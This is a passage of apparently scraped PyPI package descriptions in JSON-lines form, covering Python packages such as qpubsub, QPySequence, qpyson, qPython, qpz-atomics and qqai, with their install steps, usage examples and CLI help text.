1, unit no.= 5 and mark = 5You can randomly select this kind of questions from your question bank database if it exists.ReferencesAn Algorithm for Question Paper Template\nGeneration in Question Paper Generation System"} +{"package": "qpth", "pacakge-description": "No description available on PyPI."} +{"package": "qpu", "pacakge-description": "QPU (Quantum Processing Unit)A library for quantum processing units (IBM, D-Wave) containing common operations.NoteThis project has been set up using PyScaffold 3.1. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qpubsub", "pacakge-description": "library.qpubsubpubsub layer for NLP servicesUsagesConfigsYou need to configure these in your service:{\"PROJECT_ID\":\"...\",\"SUBSCRIPTION_NAME\":\"...\",\"TOPIC_NAME\":\"...\",\"MAX_MESSAGES\":...}Where:PROJECT_ID: qordoba project id e.g. qordoba-develSUBSCRIPTION_NAME: a subscription to pull the messages from e.g. dev4.segment-delegator.gender-tone-pubsub.allLangTOPIC_NAME: where to publish the result messages e.g. dev4.segment-delegator.gender-tone-pubsub-latch.allLangMAX_MESSAGES: The maximum number of messages in the subscriber queue e.g. 100Use PubSub onlyAdd this to the serviceapplication.pyps_connection=QPubSub(analyzer,white_lister=whitelister,category=category,verbose=VERBOSE,debug=DEBUG,ignore_html=IGNORE_HTML,sentence_token_limit=SENTENCE_TOKEN_LIMIT,ignore_inside_quotes=False)ps_connection.connect()Use PubSub with RESTAdd this to the serviceapplication.pyrest_connection=QRest(analyzer,white_lister=whitelister,category=category,verbose=VERBOSE,debug=DEBUG,ignore_html=IGNORE_HTML,sentence_token_limit=SENTENCE_TOKEN_LIMIT,ignore_inside_quotes=False)ps_connection=QPubSub(analyzer,white_lister=whitelister,category=category,verbose=VERBOSE,debug=DEBUG,ignore_html=IGNORE_HTML,sentence_token_limit=SENTENCE_TOKEN_LIMIT,ignore_inside_quotes=False)ps_connection.connect_with_rest(rest_connection)Service docker changes to compilegoogle-cloud-pubsubadd the following lines beforepip install -r requirements.txtcommandapkupdate&&\\apkadd--virtualbuild-dependencieslinux-headersbuild-basegcc&&\\add the following lines afterpip install -r requirements.txtcommandapkdelbuild-dependencies&&\\rm-rf/var/cache/apk/*&&\\LicenseThis software is not licensed. If you do not work at Qordoba, you are not legally allowed to use it. Also, it's just helper functions that really won't help you. If something in it does look interesting, and you would like access, open an issue.TODOreduce compile timeadd testshandle errors, e.g. publish it to an error topic or return empty issues to the same topic."} +{"package": "qpvdi", "pacakge-description": "python-dependency-injectionStep to publish open sourceInstall and run buildpython -m buildInstall Twinepip install twineUpload sourcetwine upload dist/*Usage:pip install qpvdi"} +{"package": "qpvdi-quangpv.uit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qpy", "pacakge-description": "Qpy provides a convenient mechanism for generating safely-quoted xml from python code. It does this\nby implementing a quote-no-more string data type and a slightly modified python compiler."} +{"package": "qpydoc", "pacakge-description": "qpydocQuarto-based Python API Documentation ToolDocumenation:https://joelkim.github.io/qpydoc/"} +{"package": "qPyProfiler", "pacakge-description": "qPyProfiler is a GUI (Graphical User Interface) to the Python profiler. It\nallow user to profile python application and browse profiling result in a\nconvenient way. This projet starts on june 2007. I started this project\nbecause I do not found any free software that do that for python profiling."} +{"package": "qpyr", "pacakge-description": "QPYR - QR Code Generation in PythonPython package designed for creating QR codes with support for all QR code versions from 1 to 40. Designed for developers looking for a simple way to integrate QR code generation into their Python applications \ud83d\ude80\ud83d\ude80\ud83d\ude80.Basic usageTo use the package, import and call themainfunction as follows:# Save qrcode as imageimportqpyrqpyr.main(\"google.com\",filepath=\"qr1.png\")# Show qrcode as imageimportqpyrqpyr.main(\"google.com\",show_image=True)ContributingContributions are warmly welcomed! Whether you're tackling a bug, adding a new feature, or improving documentation, your input is invaluable in making this library better."} +{"package": "qpysequence", "pacakge-description": "QPySequenceIntroductionQPySequence, which stands forQblox Python Sequence, is a python library developed by Qilimanjaro to create thesequence.jsonfile that is uploaded to a Qblox sequencer.\nThe sequences that are uploaded to the Qblox instruments is a dictionary of four components:Waveforms: dictionary containing an explicit array representation of the pulses to be played, each identified with an index and a name.Acquisitions: dictionary containing different specifications for the acquisition of data, mainly the number of bins, each identified with an index and a name.Weights: dictionary containing lists of time-dependent acquisition weights, each associated with an index and a name.Program: description of the sequence in the Q1ASM language, represented as a plain text. In the program all waveforms, acquisitions and weights are referenced by their indices.In theQblox docsthere are several examples on how to write a Q1ASM program to perform a certain experiment as well as the necessary waveforms, acquisitions and weights to complete the sequence. This is task usually done by manually writing the waveforms and weights dictionaries with an inline numpy array generating function, the acquisitions are specified also manually, and finally a Q1ASM program is writen as a python formated string, with some variables inside for certain parameters.This procedure is feasible for small examples and certain simple experiments. However, when integrating this into a larger codebase, for example, inside of a general quantum control library, with a complex class structure, holding many instrument drivers and being developed by several colaborators; the maintenance, quality, readability and debugging of the code can become a cumbersome task.While certain parts of this procedure could be modularized with some helper functions, the string nature of the Q1ASM program as well with the remaining parts of the sequence it is connected to, indirectly via integers (the indices) that have to be handled separately, still leaves a lot of room for improvement with the implementation of a higher abstraction layer that would handle the creation of the sequence in an easier and more robust manner.QPySequence is a library that handles all the components of a sequence as python objects, from the sequence itself to each instruction of the program, including new abstractions as blocks and loops to structure the program in a more clear and readable way.StructureThe main classes of QPySequence imitate the structure of thesequence.jsonitself:Waveforms,Acquisitions,WeightsandProgram, as well as the classSequencewhich contains them.\nTheProgramclass is the one with higher complexity of the main four, with several internal classes used to structure all the instructions it holds (instances of classes which inherit from the abstractInstructionclass). In contrast, the other three main classes (Acquisitions,WeightsandWaveforms) share a very similar structure, since their structure is that of their dictionary counterpart insequence.json, with the addition of methods that facilitate their construction.\nAll the classes that are not internal have an implementation of therepr()method, which gives the equivalent string representation of that object that will be actually sent to the sequencer. In this way, when aSequenceobject is completed with all of its components and itsrepr()method is called, it calls therepr()method of its elements, which gets recursively repeated until until reaching the lower layers, obtaining finally the complete string representation of thesequence.jsonfile that can be directly uploaded to a Qblox sequencer.\nTherepr()method can be called on any component of QPySequence, which allow to only generate the string representation of a single component, as theProgramfor example, if desired.ExampleThis simple example illustrates how to create a sequence for an averaged readoutimportqpysequenceasqpsimportnumpyasnp# Experiment parametersreadout_duration=1000play_acq_delay=120averaging_repetitions=1024# Create waveformswaveforms=qps.waveforms.Waveforms()readout_pulse=np.array([1.0+0.0jfor_inrange(readout_duration)],dtype=np.complex128)ro_index_i,ro_index_q=waveforms.add_pair_from_complex(readout_pulse)# Create acquisitionsacquisitions=qps.acquisitions.Acquisitions()acq_index=acquisitions.add(\"averaged\")# Create an empty weights objectweights={}# Create the programprogram=qps.program.Program()main_loop=qps.program.Loop(\"main\",averaging_repetitions)play=qps.program.instructions.Play(ro_index_i,ro_index_q,play_acq_delay)acquire=qps.program.instructions.Acquire(acq_index,bin_index=0,wait_time=readout_duration)main_loop.append_components([play,acquire])program.append_block(main_loop)# Create the sequence with all the componentssequence=qps.Sequence(program,waveforms,acquisitions,weights)# The sequence can now be converted to a json string and uploaded to a qblox sequencersequence_json=repr(sequence)Development setupIf you want to participate in the project, set up first your local environment, set up the git hooks and install the library.Read thedevelopmentdocumentation."} +{"package": "qpyson", "pacakge-description": "qpyson: Thin Commandline Tool to Explore, Transform, and Munge JSON using PythonThe JSON querying tool,jq, is a\nreally powerful tool. However, it\u2019s sometimes a bit involved and has a\nlearning curve that requires digging into thejq\nmanualand familiarizing\nyourself with a custom language.qpysonis a thin commandline tool to explore, transform, or munge JSON\nusing Python as the processing language.GoalsProcess (filter, map, general munging) of JSON files using PythonThin layer to process or apply transforms written in PythonProvide Python function as a string to the commandline or define\nPython functions in an external fileCustom functions can be parameterized and configured from the\ncommandlineOutput results are emitted as JSON or in tabular form (usingtabulatefor quick viewing\nfrom the commandlineNon-GoalsA replacement forjqNo custom DSL for filtering or querying (use Python directly)Does not support streaming (JSON files are loaded into memory)InstallationRecommended to install using avirtualenvorcondaenv to install.pip install qpysonQuick TourExample data from the Iris dataset.head examples/iris.json\n\n[\n {\"sepalLength\": 5.1, \"sepalWidth\": 3.5, \"petalLength\": 1.4, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 4.9, \"sepalWidth\": 3.0, \"petalLength\": 1.4, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 4.7, \"sepalWidth\": 3.2, \"petalLength\": 1.3, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 4.6, \"sepalWidth\": 3.1, \"petalLength\": 1.5, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 5.0, \"sepalWidth\": 3.6, \"petalLength\": 1.4, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 5.4, \"sepalWidth\": 3.9, \"petalLength\": 1.7, \"petalWidth\": 0.4, \"species\": \"setosa\"},\n {\"sepalLength\": 4.6, \"sepalWidth\": 3.4, \"petalLength\": 1.4, \"petalWidth\": 0.3, \"species\": \"setosa\"},\n {\"sepalLength\": 5.0, \"sepalWidth\": 3.4, \"petalLength\": 1.5, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 4.4, \"sepalWidth\": 2.9, \"petalLength\": 1.4, \"petalWidth\": 0.2, \"species\": \"setosa\"},The commandline tool takes a function written as commandline string or\nreferenced in an external file as well as the JSON file to be processed.qpyson --help\n\nqpyson: error: the following arguments are required: path_or_cmd, json_file\nusage: qpyson [-f FUNCTION_NAME] [-n] [--indent INDENT] [-t]\n [--table-style TABLE_STYLE]\n [--log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}]\n [--help]\n path_or_cmd json_file\n\nUtil to use Python to process (e.g., filter, map) JSON files\n\npositional arguments:\n path_or_cmd Path to python file, or python cmd\n json_file Path to JSON file\n\noptional arguments:\n -f FUNCTION_NAME, --function-name FUNCTION_NAME\n Function name (default: f)\n -n, --no-pretty (Non-table) Pretty print the output of dicts and list\n of dicts (default: False)\n --indent INDENT (Non-table) Pretty print indent spacing (default: 2)\n -t, --print-table Pretty print results (default: False)\n --table-style TABLE_STYLE\n Table fmt style using Tabulate. See\n https://github.com/astanin/python-tabulate#table-\n format for available options (default: simple)\n --log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}\n Log level (default: NOTSET)\n --help Show this help message and exit (default: False)We can define a custom function to process the JSON dataset. By default\nthe function is namedfand can be customized by-for--function-namecommandline argument.qpyson \"def f(d): return d[0]\" examples/iris.json\n\n{\n \"sepalLength\": 5.1,\n \"sepalWidth\": 3.5,\n \"petalLength\": 1.4,\n \"petalWidth\": 0.2,\n \"species\": \"setosa\"\n}We can also write custom functions in a Python file.cat examples/iris_explore.py\n\ndef f(d):\n return d[0]\n\n\ndef f2(d, max_items: int = 10):\n return d[:max_items]\n\n\ndef f3(d, max_items: int = 5):\n return [x for x in d if x[\"species\"] == \"setosa\"][:max_items]\n\n\ndef f4(d, sort_field: str, sort_direction: str = \"asc\", max_items: int = 5):\n reverse = not (sort_direction == \"asc\")\n d.sort(key=lambda x: x[sort_field], reverse=reverse)\n return d[:max_items]\n\n\ndef f0(d):\n # Identity operator\n return d\n\n\ndef first(d):\n return d[0]\n\n\ndef p(d, field: str = \"sepalLength\"):\n import pandas as pd\n\n df = pd.DataFrame.from_dict(d)\n sdf = df.describe()\n return sdf.to_dict()[field]Executing--helpwill show the output options.qpyson examples/iris_explore.py examples/iris.json --help\n\nusage: qpyson [-f FUNCTION_NAME] [-n] [--indent INDENT] [-t]\n [--table-style TABLE_STYLE]\n [--log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}]\n [--help]\n path_or_cmd json_file\n\nUtil to use Python to process (e.g., filter, map) JSON files\n\npositional arguments:\n path_or_cmd Path to python file, or python cmd\n json_file Path to JSON file\n\noptional arguments:\n -f FUNCTION_NAME, --function-name FUNCTION_NAME\n Function name (default: f)\n -n, --no-pretty (Non-table) Pretty print the output of dicts and list\n of dicts (default: False)\n --indent INDENT (Non-table) Pretty print indent spacing (default: 2)\n -t, --print-table Pretty print results (default: False)\n --table-style TABLE_STYLE\n Table fmt style using Tabulate. See\n https://github.com/astanin/python-tabulate#table-\n format for available options (default: simple)\n --log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}\n Log level (default: NOTSET)\n --help Show this help message and exit (default: False)Executing functionf, yields:qpyson examples/iris_explore.py examples/iris.json \n\n{\n \"sepalLength\": 5.1,\n \"sepalWidth\": 3.5,\n \"petalLength\": 1.4,\n \"petalWidth\": 0.2,\n \"species\": \"setosa\"\n}The output view can be changed to a table view using--print-tableor-t.qpyson examples/iris_explore.py examples/iris.json --print-table --table-style github\n\n| sepalLength | sepalWidth | petalLength | petalWidth | species |\n|---------------|--------------|---------------|--------------|-----------|\n| 5.1 | 3.5 | 1.4 | 0.2 | setosa |A better example using functionf2defined iniris_explore.pyqpyson examples/iris_explore.py examples/iris.json --function-name f2 --print-table\n\n sepalLength sepalWidth petalLength petalWidth species\n------------- ------------ ------------- ------------ ---------\n 5.1 3.5 1.4 0.2 setosa\n 4.9 3 1.4 0.2 setosa\n 4.7 3.2 1.3 0.2 setosa\n 4.6 3.1 1.5 0.2 setosa\n 5 3.6 1.4 0.2 setosa\n 5.4 3.9 1.7 0.4 setosa\n 4.6 3.4 1.4 0.3 setosa\n 5 3.4 1.5 0.2 setosa\n 4.4 2.9 1.4 0.2 setosa\n 4.9 3.1 1.5 0.1 setosaCustom functions can be defined with required or optional values (with\ndefaults) combined with Python 3 type annotations to generatecat examples/iris.py\n\n# More examples that demonstrate generating commandline arguments\n\n\ndef f(d, sort_field: str, sort_direction: str = \"asc\", max_items: int = 5):\n reverse = not (sort_direction == \"asc\")\n d.sort(key=lambda x: x[sort_field], reverse=reverse)\n return d[:max_items]\n\n\ndef g(d, field: str = \"sepalLength\"):\n import pandas as pd\n\n df = pd.DataFrame.from_dict(d)\n sdf = df.describe()\n return sdf.to_dict()[field]And calling--helpwill show the custom function specific arguments\n(e.g.,--max_itemsand--sort_direction)qpyson examples/iris.py examples/iris.json --help\n\nusage: qpyson [-f FUNCTION_NAME] [-n] [--indent INDENT] [-t]\n [--table-style TABLE_STYLE]\n [--log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}]\n [--help] [--sort_field SORT_FIELD]\n [--sort_direction SORT_DIRECTION] [--max_items MAX_ITEMS]\n path_or_cmd json_file\n\nUtil to use Python to process (e.g., filter, map) JSON files\n\npositional arguments:\n path_or_cmd Path to python file, or python cmd\n json_file Path to JSON file\n\noptional arguments:\n -f FUNCTION_NAME, --function-name FUNCTION_NAME\n Function name (default: f)\n -n, --no-pretty (Non-table) Pretty print the output of dicts and list\n of dicts (default: False)\n --indent INDENT (Non-table) Pretty print indent spacing (default: 2)\n -t, --print-table Pretty print results (default: False)\n --table-style TABLE_STYLE\n Table fmt style using Tabulate. See\n https://github.com/astanin/python-tabulate#table-\n format for available options (default: simple)\n --log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}\n Log level (default: NOTSET)\n --help Show this help message and exit (default: False)\n --sort_field SORT_FIELD\n sort_field type: from custom func `f`\n (default: _empty)\n --sort_direction SORT_DIRECTION\n sort_direction type: from custom func `f`\n (default: asc)\n --max_items MAX_ITEMS\n max_items type: from custom func `f`\n (default: 5)And calling with custom options yields:qpyson examples/iris.py examples/iris.json -t --max_items=3 --sort_direction=desc --sort_field sepalLength\n\n sepalLength sepalWidth petalLength petalWidth species\n------------- ------------ ------------- ------------ ---------\n 7.9 3.8 6.4 2 virginica\n 7.7 3.8 6.7 2.2 virginica\n 7.7 2.6 6.9 2.3 virginicaAnother Example calling pandas underneath the hood to get a quick\nsummary of the data.qpyson examples/iris.py examples/iris.json -t -f g --field=sepalLength\n\n count mean std min 25% 50% 75% max\n------- ------- -------- ----- ----- ----- ----- -----\n 150 5.84333 0.828066 4.3 5.1 5.8 6.4 7.9It\u2019s also possible to create thin JSON munging tools for configuration\nof systems or tools that take JSON as input.For example a JSON configuration template with defaults.cat examples/config_template.json\n\n{\n \"alpha\": 1234,\n \"beta\": null,\n \"gamma\": 90.1234\n}And a processing function,f.cat examples/config_processor.py\n\ndef f(dx, alpha: float, beta: float, gamma: float):\n \"\"\"Simple example of config munging\"\"\"\n\n def _set(k, v):\n if v:\n dx[k] = v\n\n items = [(\"alpha\", alpha), (\"beta\", beta), (\"gamma\", gamma)]\n\n for name, value in items:\n _set(name, value)\n\n dx[\"_comment\"] = \"Configured with qpyson\"\n return dxRunning--helpwill show the supported configuration options.qpyson examples/config_processor.py examples/config_template.json --help\n\nusage: qpyson [-f FUNCTION_NAME] [-n] [--indent INDENT] [-t]\n [--table-style TABLE_STYLE]\n [--log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}]\n [--help] [--alpha ALPHA] [--beta BETA] [--gamma GAMMA]\n path_or_cmd json_file\n\nUtil to use Python to process (e.g., filter, map) JSON files\n\npositional arguments:\n path_or_cmd Path to python file, or python cmd\n json_file Path to JSON file\n\noptional arguments:\n -f FUNCTION_NAME, --function-name FUNCTION_NAME\n Function name (default: f)\n -n, --no-pretty (Non-table) Pretty print the output of dicts and list\n of dicts (default: False)\n --indent INDENT (Non-table) Pretty print indent spacing (default: 2)\n -t, --print-table Pretty print results (default: False)\n --table-style TABLE_STYLE\n Table fmt style using Tabulate. See\n https://github.com/astanin/python-tabulate#table-\n format for available options (default: simple)\n --log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}\n Log level (default: NOTSET)\n --help Show this help message and exit (default: False)\n --alpha ALPHA alpha type: from custom func `f`\n (default: _empty)\n --beta BETA beta type: from custom func `f`\n (default: _empty)\n --gamma GAMMA gamma type: from custom func `f`\n (default: _empty)Now configuringalpha,betaandgamma.qpyson examples/config_processor.py examples/config_template.json --alpha 1.23 --beta 2.34 --gamma 3.45\n\n{\n \"alpha\": 1.23,\n \"beta\": 2.34,\n \"gamma\": 3.45,\n \"_comment\": \"Configured with qpyson\"\n}TestingTesting is currently done using RMarkdown using the make targetdoc.This should probably be ported to non-R based approach. However, this\ncurrent approach does keep the docs (e.g., README.md) up to date.Related JQ-ish toolshttps://github.com/dbohdan/structured-text-tools#json"} +{"package": "qPython", "pacakge-description": ".. ATTENTION::This project is in maintenance mode. We may fix bugs, but no new features will be added in foreseeable future.qPython=======qPython is a Python library providing support for interprocess communication between Python and kdb+ processes, it offers:- Synchronous and asynchronous queries- Convenient asynchronous callbacks mechanism- Support for kdb+ protocol and types: v3.0, v2.6, v<=2.5- Uncompression of the IPC data stream- Internal representation of data via numpy arrays (lists, complex types) and numpy data types (atoms)- Supported on Python 2.7/3.4/3.5/3.6 and numpy 1.8+For more details please refer to the `documentation`_.Installation------------To install qPython from PyPI:``$ pip install qpython``**Please do not use old PyPI package name: exxeleron-qpython.**Building package----------------Documentation~~~~~~~~~~~~~qPython documentation is generated with help of `Sphinx`_ document generator.In order to build the documentation, including the API docs, execute:``make html`` from the doc directory.Documentation is built into the: ``doc/build/html/`` directory.Compile Cython extensions~~~~~~~~~~~~~~~~~~~~~~~~~qPython utilizes `Cython`_ to tune performance critical parts of the code.Instructions:- Execute: ``python setup.py build_ext --inplace``Build binary distribution~~~~~~~~~~~~~~~~~~~~~~~~~Instructions:- Execute: ``python setup.py bdist``Testing~~~~~~~qPython uses py.test as a test runner for unit tests.Instructions:- Make sure that top directory is included in the ``PYTHONPATH``- Execute: ``py.test``Requirements~~~~~~~~~~~~qPython requires numpy 1.8 to run.Optional requirements have to be met to provide additional features:- tune performance of critical parts of the code:- Cython 0.20.1- support serialization/deserialization of ``pandas.Series`` and ``pandas.DataFrame``- pandas 0.14.0- run Twisted sample:- Twisted 13.2.0- build documentation via Sphinx:- Sphinx 1.2.3- mock 1.0.1Required libraries can be installed using `pip`_.To install all the required dependencies, execute:``pip install -r requirements.txt``Minimal set of required dependencies can be installed by executing:``pip install -r requirements-minimal.txt``.. _Cython: http://cython.org/.. _Sphinx: http://sphinx-doc.org/.. _pip: http://pypi.python.org/pypi/pip.. _documentation: http://qpython.readthedocs.org/en/latest/"} +{"package": "qPython3", "pacakge-description": "qPython is a Python library providing support for interprocess communication between Python and kdb+ processes, it offers:Synchronous and asynchronous queriesConvenient asynchronous callbacks mechanismSupport for kdb+ protocol and types as of kdb+ v4.0Uncompression of the IPC data streamInternal representation of data via numpy arrays (lists, complex types) and numpy data types (atoms)Supported on Python 3.4/3.5/3.6 and numpy 1.8+For more details please refer to thedocumentation.InstallationTo install qPython from PyPI:$ pip install qpython3Please do not use old PyPI package name: qpython or exxeleron-qpython.Building packageDocumentationqPython documentation is generated with help ofSphinxdocument generator.\nIn order to build the documentation, including the API docs, execute:make htmlfrom the doc directory.Documentation is built into the:doc/build/html/directory.Compile Cython extensionsqPython utilizesCythonto tune performance critical parts of the code.Instructions:Execute:python setup.py build_ext--inplaceBuild binary distributionInstructions:Execute:python setup.py bdistTestingqPython uses py.test as a test runner for unit tests.Instructions:Make sure that top directory is included in thePYTHONPATHExecute:py.testRequirementsqPython requires numpy 1.8 to run.Optional requirements have to be met to provide additional features:tune performance of critical parts of the code:Cython 0.20.1support serialization/deserialization ofpandas.Seriesandpandas.DataFramepandas 0.14.0run Twisted sample:Twisted 13.2.0build documentation via Sphinx:Sphinx 1.2.3mock 1.0.1Required libraries can be installed usingpip.To install all the required dependencies, execute:pip install-rrequirements.txtMinimal set of required dependencies can be installed by executing:pip install-rrequirements-minimal.txt"} +{"package": "qPython-nocython", "pacakge-description": "ATTENTION::This project is in maintenance mode. We may fix bugs, but no new features will be added in foreseeable future.qPythonqPython is a Python library providing support for interprocess communication between Python and kdb+ processes, it offers:Synchronous and asynchronous queriesConvenient asynchronous callbacks mechanismSupport for kdb+ protocol and types: v3.0, v2.6, v<=2.5Uncompression of the IPC data streamInternal representation of data via numpy arrays (lists, complex types) and numpy data types (atoms)Supported on Python 2.7/3.4/3.5/3.6 and numpy 1.8+For more details please refer to thedocumentation.InstallationTo install qPython from PyPI:$ pip install qpythonPlease do not use old PyPI package name: exxeleron-qpython.Building packageDocumentationqPython documentation is generated with help ofSphinxdocument generator.\nIn order to build the documentation, including the API docs, execute:make htmlfrom the doc directory.Documentation is built into the:doc/build/html/directory.Compile Cython extensionsqPython utilizesCythonto tune performance critical parts of the code.Instructions:Execute:python setup.py build_ext--inplaceBuild binary distributionInstructions:Execute:python setup.py bdistTestingqPython uses py.test as a test runner for unit tests.Instructions:Make sure that top directory is included in thePYTHONPATHExecute:py.testRequirementsqPython requires numpy 1.8 to run.Optional requirements have to be met to provide additional features:tune performance of critical parts of the code:Cython 0.20.1support serialization/deserialization ofpandas.Seriesandpandas.DataFramepandas 0.14.0run Twisted sample:Twisted 13.2.0build documentation via Sphinx:Sphinx 1.2.3mock 1.0.1Required libraries can be installed usingpip.To install all the required dependencies, execute:pip install-rrequirements.txtMinimal set of required dependencies can be installed by executing:pip install-rrequirements-minimal.txt"} +{"package": "qPyUtils", "pacakge-description": "No description available on PyPI."} +{"package": "qpz-atomics", "pacakge-description": "OverviewThis library provides atomic functions implementations for easing the\ndevelopment of quantum networking protocols. The library provides\nfunctions in a simulation backend agnostic way thanks to a thin wrapping\nof their basic functionalities. The various atomic function\nimplementations are dispatched in several submodules depending on their\nanticipated use. The surrent submodules classification is:mapping(the thing wrapper around a simulation backend)gate(everything that applies a fixed quantum unitary over 1 or 2\nqubits)prep(operations related to prepare given sets of quantum states)meas(operations related to measure quantum subsystems according\nto some fixed POVM)test(operations related to testing that one or several quantum\nsubsystems have a given property)util(useful operations that might not be directly related to a\nspecific quantum operation but which are good to have)tran(transport layer protocols which might not be readily\navailable for all backends or which would need to include more robust\nimplementations)Functionality tests are being developed for the atomic functions relying\non thehypothesispackage. The test tend to follow the cryptographic\napproach of \u201ccorrectness\u201d. The \u201csecurity\u201d part is usually not performed\nas this most of the times involves checking indistinguishability of\nprobability distributions\u2026StatusImplemented atomic functions and planningNameImplementationDoc stringTestSubmoduleCommentSending qubit (given by simulation backend)DNEOKNAsimulaqron mappingReceive qubit (given by simulation backend)DNEOKNAsimulaqron mappingLocal Clifford Gates (CNOT, H, Pauli\u2019s)DNEOKNAsimulaqron mappingLocal non-Clifford Gates (T, Tinv)DNEOKNAsimulaqron mappingCZ gateDNEOKTDOgateself inverse, and corresponds to classically controlled Z for comp. basis controlCSWAP gateDNEOKTDOgateCreation Pauli eigenstatesDNEOKDNEprepCreation and broadcast of n-party GHZ stateDNEOKDNEprepSingle qubit equatorial plane preparationDNEOKTDOprepCreation and broadcast of n-party stabilizer statesNXTprepQFactoryLTRprepProjections onto Pauli eigenstatesDNEOKOKmeasSingle qubit equatorial plane measurementTDOmeasMulti qubit POVMLTRmeasQuantum One-Time-Pad encode / decodeDNEOKOKpresBB84 encode / decode is a subset of QOTP encode / decodeNANANANACollective BB84 encodingDNGpresSwap TestDNEOKTDOtestVerification of stabilizer statetestQuantum RNGDNECheckTDOutilInformation reconciliationLTRutilClassical error correctionLTRutilQuantum error correctionLTRutilPrivacy amplificationLTRutilQuantum one-way functionNXTutilWeak string erasureNXTTeleportation sendTDOtranTeleportation receiveTDOtranQuantum authenticated channelLTRSecure classical broadcast channelLTRClassical authenticated channelLTRDesign principlesThere exist many different quantum computing backends. The idea with\nthis library was to abstract them away so that code running written\nusing the library could be run on other backends, provided that the rest\nof the code not composed of functions defined by the library is not\nbackend specific.To do this, we instantiate the library by giving it a mapping and a\nnode. The mapping is the translation of the backend specific way of\ncalling elementary quantum operations, while the node is the actual\nquantum registers that are available to perform the computation. The\nnode usually contains also some additional functions such as sending\nqubits to other nodes, receiving and sending entanglement etc. The\ndifferences have been abstracted away with the mappings forsimulaqronandqunetsim. Other mappings have been considered\nand used but not yet made available most notably forNetsquid.Feel free to add functions, or code new mappings by forking and\npull-requesting insertion of your additions. Please keep us updated with\nyour work so that we inform you of changes that could be breaking\nthings.UsageLook at theexamples/examples.pyfile. The library is instantiated\nfor each node (as if the nodes were independent computers, each loading\nits version of the library).Other sources of inspirations are the tests defined in thetestsdirectoryNew atomic functions will be added following the list established by\nextracting atomic functions from the Quantum Protocol Zoo.TestingTests can be run usingpython setup.py testat the root of the\nrepository.The repository includes a tests directory that contains the filetest_qpz_atomics.pywhich gathers all the tests implemented. It is\nusing thepytestpackage to launch the tests and gather statistics,\nwhile being based onhypothesisfor generating examples.For the tests to run, you need to have a quatum network simulator\navailable and running. We have chosen to implement the tests usingsimulaqronas a backend, hence requiring a runningsimulaqroninstance. This can\nbe done typing the following:simulaqronsetmax-qubits100simulaqronstartOther backends could be used provided the tests are rewritten and the\nrequired backend is available and properly mapped in the library.AcknowledgmentsThis project is part of Laboratoire d\u2019Informatique Paris 6 - Sorbonne\nUniversit\u00e9 / CNRS - Quantum Information Team. It is funded and is part\nof the Quantum Internet Alliance European Project."} +{"package": "qq", "pacakge-description": "UNKNOWN"} +{"package": "qq-3-toolbox", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "qqai", "pacakge-description": "# qqai\u63d0\u4f9b[\u817e\u8bafAI](https://ai.qq.com/)\u7b80\u5355\u6613\u7528\u7684python\u63a5\u53e3\u3002## \u5b89\u88c5```bashpip install qqai```## \u76ee\u524d\u5b8c\u6210\u7684\u529f\u80fd- [ ] \u81ea\u7136\u8bed\u8a00\u5904\u7406- [x] \u57fa\u7840\u6587\u672c\u5206\u6790- [x] \u5206\u8bcd (`qqai.nlp.text.WordSeg`)- [x] \u8bcd\u6027\u6807\u6ce8 (`qqai.nlp.text.WordPos`)- [x] \u4e13\u6709\u540d\u8bcd\u8bc6\u522b (`qqai.nlp.text.WordNer`)- [x] \u540c\u4e49\u8bcd\u8bc6\u522b (`qqai.nlp.text.WordSyn`)- [x] \u8bed\u4e49\u89e3\u6790- [x] \u610f\u56fe\u6210\u5206\u8bc6\u522b (`qqai.nlp.text.WordCom`)- [x] \u60c5\u611f\u5206\u6790- [x] \u60c5\u611f\u5206\u6790\u8bc6\u522b (`qqai.nlp.text.TextPolar`)- [x] \u667a\u80fd\u95f2\u804a- [x] \u57fa\u7840\u95f2\u804a (`qqai.nlp.text.TextChat`)- [ ] \u673a\u5668\u7ffb\u8bd1- [x] \u6587\u672c\u7ffb\u8bd1- [x] \u6587\u672c\u7ffb\u8bd1\uff08AI Lab\uff09 (`qqai.nlp.translate.TextTranslateAILab`)- [x] \u6587\u672c\u7ffb\u8bd1\uff08\u7ffb\u8bd1\u541b\uff09 (`qqai.nlp.translate.TextTranslateFanyi`)- [x] \u56fe\u7247\u7ffb\u8bd1 (`qqai.nlp.translate.ImageTranslate`)- [ ] \u8bed\u97f3\u7ffb\u8bd1- [x] \u8bed\u79cd\u8bc6\u522b (`qqai.nlp.translate.TextDetect`)- [ ] \u667a\u80fd\u8bed\u97f3- [ ] \u8bed\u97f3\u8bc6\u522b- [x] \u8bed\u97f3\u8bc6\u522b-echo\u7248 (`qqai.aai.audio.AudioRecognitionEcho`)- [ ] \u8bed\u97f3\u8bc6\u522b-\u6d41\u5f0f\u7248\uff08AI Lab\uff09- [ ] \u8bed\u97f3\u8bc6\u522b-\u6d41\u5f0f\u7248(WeChat AI)- [ ] \u957f\u8bed\u97f3\u8bc6\u522b- [ ] \u5173\u952e\u8bcd\u68c0\u7d22- [x] \u8bed\u97f3\u5408\u6210- [x] \u8bed\u97f3\u5408\u6210\uff08AI Lab\uff09 (`qqai.aai.tts.TTSAILab`)- [x] \u8bed\u97f3\u5408\u6210\uff08\u4f18\u56fe\uff09 (`qqai.aai.tts.TTSYouTu`)- [x] \u8ba1\u7b97\u673a\u89c6\u89c9- [x] \u667a\u80fd\u9274\u9ec4 (`qqai.vision.picture.Porn`)- [x] 